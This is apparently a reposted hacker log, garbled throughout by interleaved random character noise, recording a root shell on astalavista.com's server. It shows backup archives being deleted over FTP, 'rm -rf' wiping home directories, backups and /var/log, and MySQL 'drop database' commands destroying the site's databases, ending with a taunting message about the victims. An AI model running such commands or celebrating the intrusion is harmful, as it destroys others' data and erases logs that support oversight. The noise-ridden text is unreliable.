2 z3 Y! f- E/ I1 T$ a-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
" o0 A; m. |8 G-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
4 `" k$ ~ i( k* \; w/ V-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar4 B# {' W* I# K
[snip]
: w1 @7 R1 C" H# X+ I0 |1 a0 u226 Transfer complete./ u$ L0 H# q- k2 H5 x- B1 O
ftp> mdelete *
$ b& { B: D6 Y, j4 [ftp> ls -la3 i4 [9 Q6 G3 r# ~ _* w
227 Entering Passive Mode (212,254,194,163,2,193)
% O0 g9 i( A9 b8 v, L& o3 @; |150 Opening BINARY mode data connection for ‘file list’.. S8 F2 X! f5 }2 K0 p
226 Transfer complete.: y7 O1 m2 H4 X; H W5 q0 }
ftp>
$ E8 }# S7 ]2 z& y! K/ j0 K C4 P9 G8 O% [
sh-3.2# cd /home: H/ X7 W" R, f# W V' [
sh-3.2# ls -la1 g' @ ~; U+ }& ~8 P
total 120. I) Y( O# M- G8 m1 B
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
O) K) e5 z. D' T9 Gdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..% Z3 O9 \/ z9 {# l0 O, l0 M; N3 B6 V: m
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin- m+ u( P: c( a/ T
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
& Z: j$ I4 W* S, K$ }-rw——- 1 root root 8192 Jun 3 02:45 aquota.user" {; U- o0 K& t
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet3 e0 W9 b6 q; u1 q1 G$ c+ H
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup0 x5 X, |1 y1 @" e1 g. H) ?
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161& G/ D7 M: j7 E: a; M
drwx–x–x 10 com com 4096 Apr 28 12:40 com
( v! D$ p5 W9 \drwxr-xr-x 2 root root 4096 May 17 2007 ftp% E$ N8 `! |7 c* q- [6 y
drwx—— 3 jon jon 4096 Sep 21 2007 jon% |3 P6 O0 b' {( m$ A7 h
drwx—— 2 root root 16384 Sep 11 2007 lost+found
. j- o! M j. r% `1 |drwxr-xr-x 2 root root 4096 Sep 14 2007 my
4 z3 c+ w# ^ O5 S4 Sdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
# i. Z; E4 k4 h) f0 s7 I) Cdrwx—— 2 jon jon 4096 Sep 15 2007 test; r1 l X& E; j& y* e' X
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp# t5 i$ j7 n [! @& r' h: H0 X+ \
6 i- f3 ?+ R1 P) gsh-3.2# rm -rf backup/
. [) R5 g$ U, s) t* j8 ]3 ish-3.2# rm -rf backup.14161/
( b+ Q7 `* x, ~% h% S9 Ush-3.2# rm -rf ftp/
" O. G- `: _, X- N0 ssh-3.2# rm -rf jon/9 g% p$ I6 N x" K+ Z& z+ o
sh-3.2# rm -rf my/
# o I' }4 X! g+ fsh-3.2# rm -rf mysqldata/
- w/ t; a0 Q$ u: r9 gsh-3.2# rm -rf test/
' K! a# x6 y5 V4 {" ]sh-3.2# rm -rf tmp/
) N2 W. X$ A. V$ S+ _# h" Dsh-3.2# cd ~
9 W7 ~7 b. N' ?9 [; F( {sh-3.2# rm -rf *
* B+ b0 ~/ y" Z% W, G0 L- _+ B, bsh-3.2# rm -rf /var/log/
7 x4 P- y$ O3 trm: cannot remove directory `/var/log//proftpd’: Directory not empty5 c! t9 O" h6 t6 ~* v7 d* t7 i9 G
sh-3.2# rm -rf /home/*
7 W) n7 l. f# j4 k! f7 f; }sh-3.2# mysql
4 Q+ q$ [1 N: Q( _Welcome to the MySQL monitor. Commands end with ; or \g.
$ b" U3 G1 P: Q% V5 XYour MySQL connection id is 4071561 \, w3 C" S9 i' y
Server version: 5.0.45-community-log MySQL Community Edition (GPL)7 Z, S5 e, ~, ~, z# X
/ H2 f/ h: c; A7 q. x7 QType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer. y2 p( V3 T2 a! X. ?, v$ `
* m: V/ u- S1 c+ E1 y
mysql> show databases; b$ s; l2 E0 `2 W3 E0 i0 _
+———————–+
' c, z% T& Q: ]7 x4 _, a| Database |
5 b( S. o! G$ ^6 ]; {& @5 _+———————–+
. b$ w) x6 Z( \+ c* ~" W b| information_schema |
+ M3 ~* Y& {1 g3 y. G# q' b| astanet_ads |6 r8 S8 W; q0 q$ z
| astanet_mailing_lists |( z0 [9 U/ F$ H2 C8 O1 k" T& G
| astanet_mediawiki |$ w( K& `# o/ x- U; L
| astanet_membersystem |
# f! x3 b G) E" w0 @+ }8 H3 t| com_contrexx |
! X; w4 C$ [' J l$ z% N- K| com_contrexx2 |+ O* K! T# J4 F; S: n9 d" a3 ?
| com_contrexx2_live |( i5 E9 Z# I; ~5 @& k% x. p
| da_roundcube |& O& f, p% G! A' W% D/ s, N2 o
| dolphin |
7 n, r. I6 H" t- \; f$ ~| ideapool |
# c2 ^% O o3 [3 W| mysql |
; X7 i4 V4 s7 q$ g& L" ?| test |
$ M+ D# c9 M8 L' n; N( Y9 Y3 l+ H; m4 q| yourmaster |
) v9 R5 e% o) U' T& k9 h& d& o+———————–+2 y, X: C; z+ ?: x$ _# _7 o
14 rows in set (0.03 sec)9 p/ |6 \ ~1 M* w' u7 G! M
! g2 a+ p+ A4 B9 n& z
mysql> drop database astanet_membersystem;& L% |( J' n9 Q- K7 w% N
droQuery OK, 46 rows affected (0.81 sec)
& {; o% C/ P) q2 y$ {2 p" L
, C3 v+ c& `9 C" e: p& wmysql> drop database com_contrexx;0 b: }: i, E- s
Query OK, 211 rows affected (2.72 sec)
: x: S1 O [: v2 G' Q+ e2 R7 ^) y3 N& }
mysql> drop database com_contrexx2;
. R) |: B# E/ ~4 a4 ^Query OK, 237 rows affected (2.23 sec)
' z7 t# Y9 o& A+ m- O g& p* O( H7 J
mysql> drop database com_contrexx2_live;
* F/ o2 V, D6 r3 Q- vQuery OK, 227 rows affected (7.63 sec)8 y& b# O2 o# d) {3 k$ x* l+ w" r
0 L# o0 Q2 h, L: O6 l0 s) N
mysql> drop database ideapool;5 n% f. Z. q7 U- D, b! a
Query OK, 69 rows affected (0.19 sec)6 w0 G6 k/ U# j5 C
7 P1 w0 L# r6 p. M& Y# lmysql> drop database yourmaster;+ w+ s! V5 L2 d1 L3 t
Query OK, 158 rows affected (0.55 sec)
* c c3 c' k' o4 p
9 o2 x3 D: }4 C, u' Y# }9 q. ]mysql> drop database astanet_ads;
( k5 c: X1 G) q8 U) g* C7 uQuery OK, 9 rows affected (0.11 sec)8 O4 L# E* ?: @0 {1 A. a
% e: O, L# o/ J; Y6 f( k! D/ X7 X" _8 jmysql> drop database astanet_mailing_lists;
4 r# F! O+ [, E/ c8 n9 @# @0 IQuery OK, 24 rows affected (1.47 sec)
: _$ q+ u# N" H% D/ U4 m
9 ~5 U$ K4 G6 v$ x1 wmysql> drop database astanet_mediawiki;/ u. }& Z$ f0 |: S# Y* R- `8 l( B
Query OK, 31 rows affected (0.51 sec)
# T( ~2 [/ P$ r3 b9 d2 `0 ^/ Q3 E
mysql> show databases;
* d8 w0 d% M4 ?2 o7 h# a/ r1 w+——————–+
$ f4 N$ H2 _$ n$ m' n( ~" O/ m4 C8 d| Database |
^& E8 w: d$ V. m) z+ R- F9 p+——————–+
" ~' S3 T& p3 n9 ^5 z3 Q+ M# J| information_schema |2 r' M+ n) i* Q; `1 F, J. N
| da_roundcube |
6 h0 C0 L/ V6 ~7 f0 d- X| dolphin |# E# d- p g2 z* J9 g; T
| mysql |. W" W0 g6 ?4 A/ m, _+ E, U( i
| test |" N' n4 b' B: u+ y
+——————–+; }4 F: }1 v- w8 {0 O1 s
5 rows in set (0.00 sec)
. `8 E3 p @4 Q2 K4 [
2 J( ], W# L" s7 J$ b `What a journey! We’re not sure exactly why the “Terminator” had any influence on0 Y$ i0 c# b2 U, V0 U7 z# u* s. w
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
) u8 O! v7 _6 X3 ]. Uwrong to say this pack of morons *wont be back*.
6 C( Y$ T* V& b |
发表于 2012-11-6 21:07:34
收藏
支持
反对